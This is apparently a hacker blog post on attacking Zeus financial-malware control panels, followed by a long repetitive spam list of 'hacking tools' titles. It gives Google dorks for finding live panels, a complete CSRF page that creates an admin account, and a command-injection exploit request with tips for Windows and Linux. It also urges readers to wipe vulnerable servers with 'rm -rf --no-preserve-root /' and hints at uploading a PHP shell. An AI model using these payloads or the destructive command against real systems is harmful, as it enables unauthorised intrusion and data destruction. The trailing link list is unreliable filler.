Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More articles

1. Tools For Hacker
2. Pentest Tools List
3. Nsa Hack Tools
4. Hacker Tools Github
5. Pentest Box Tools Download
6. Top Pentest Tools
7. Pentest Tools Open Source
8. Growth Hacker Tools
9. Hack Tools For Windows
10. Hack Tool Apk No Root
11. Pentest Tools Tcp Port Scanner
12. Game Hacking
13. Physical Pentest Tools
14. Pentest Recon Tools
15. Pentest Tools Online
16. How To Hack
17. Hack Tools Github
18. Pentest Tools Review
19. Best Hacking Tools 2020
20. Pentest Tools Port Scanner
21. Hacker Tool Kit
22. Hack Tools 2019
23. Top Pentest Tools
24. Pentest Tools Url Fuzzer
25. Top Pentest Tools
26. Nsa Hack Tools
27. Hacker Tools 2020
28. Hack Tools Github
29. Hackrf Tools
30. What Are Hacking Tools
31. Hack Tool Apk No Root
32. Hacking Tools Download
33. Pentest Tools Subdomain
34. Hacker Tools List
35. Hacking Tools Pc
36. Hack Tools
37. Hacking Tools Kit
38. Hacking Tools For Windows
39. Usb Pentest Tools
40. Hacking Tools Usb
41. Hak5 Tools
42. Pentest Tools Find Subdomains
43. Hacker Tools Online
44. Termux Hacking Tools 2019
45. Hack Tools For Pc
46. Hacker Tools For Windows
47. Hacking Tools Online
48. Hacking Tools 2020
49. Pentest Tools Website
50. Hacker Tools Apk
51. Bluetooth Hacking Tools Kali
52. Hacking Tools Usb
53. Hacker Tools For Ios
54. Android Hack Tools Github
55. Pentest Tools Online
56. How To Install Pentest Tools In Ubuntu
57. Pentest Tools Subdomain
58. Hak5 Tools
59. Best Hacking Tools 2020
60. Hacker Tools Hardware
61. Hacking Apps
62. Hackers Toolbox
63. Hacking Tools Software
64. Hacking Tools And Software
65. Hackrf Tools
66. Pentest Tools For Mac
67. Tools For Hacker
68. Pentest Tools Download
69. Hack Tools For Pc
70. Hacking Tools Online
71. Hacking App
72. What Are Hacking Tools
73. Hacking Tools Kit
74. Bluetooth Hacking Tools Kali
75. Pentest Tools Linux
76. Pentest Tools Find Subdomains
77. Bluetooth Hacking Tools Kali
78. Best Pentesting Tools 2018
79. Hacking Tools Windows 10
80. Hacker Tools 2020
81. Hacker Tools Free Download
82. Hacking Tools Pc
83. Blackhat Hacker Tools
84. Pentest Tools Url Fuzzer
85. Pentest Tools Find Subdomains
86. Free Pentest Tools For Windows
87. Hacker Tools
88. Hackrf Tools
89. Hack Tools
90. Pentest Tools For Ubuntu
91. Pentest Tools Website Vulnerability
92. Underground Hacker Sites
93. Wifi Hacker Tools For Windows
94. Hack Website Online Tool
95. Install Pentest Tools Ubuntu
96. Hack Tools
97. Hacking Tools Free Download
98. Hacking Tools 2020
99. Hacker Tools Hardware
100. Hacker Tools List
101. Hack Tools Github
102. Pentest Tools Framework
103. New Hacker Tools
104. Nsa Hack Tools
105. Hacking Tools For Windows Free Download
106. Pentest Tools Website Vulnerability
107. Pentest Tools
108. Hacker Techniques Tools And Incident Handling
109. Pentest Tools
110. Pentest Tools List
111. Free Pentest Tools For Windows
112. Tools Used For Hacking
113. Hacking Tools
114. Easy Hack Tools
115. Pentest Tools Download
116. Hacker Tools Free
117. Growth Hacker Tools
118. Easy Hack Tools
119. Tools Used For Hacking
120. Hacks And Tools
121. Hacker Tools Hardware
122. Hacking Tools Pc
123. Hacking Tools For Games
124. Hacking Tools Windows 10
125. Hacker Tools Apk Download
126. Pentest Tools For Android
127. Tools For Hacker
128. Hackrf Tools
129. Hack Tools Download
130. Pentest Tools Apk
131. Nsa Hacker Tools
132. Usb Pentest Tools
133. How To Make Hacking Tools
134. Hacking Tools For Windows
135. Pentest Reporting Tools
136. Hacker Tools Apk
137. Hacker Tool Kit
138. Physical Pentest Tools
139. Pentest Tools Free
140. Pentest Tools For Windows
141. Pentest Tools Download
142. Computer Hacker
143. Hack Tools Github
144. Hack Tools For Mac
145. Hacker Tools Free Download
146. Pentest Tools Port Scanner
147. Termux Hacking Tools 2019
148. Hack Tools
149. Nsa Hack Tools Download
150. Pentest Tools Download
151. Nsa Hack Tools
152. Hack Tools
153. Hack Tools
154. Pentest Tools Kali Linux
155. Pentest Tools Framework
156. How To Make Hacking Tools
157. Hack Apps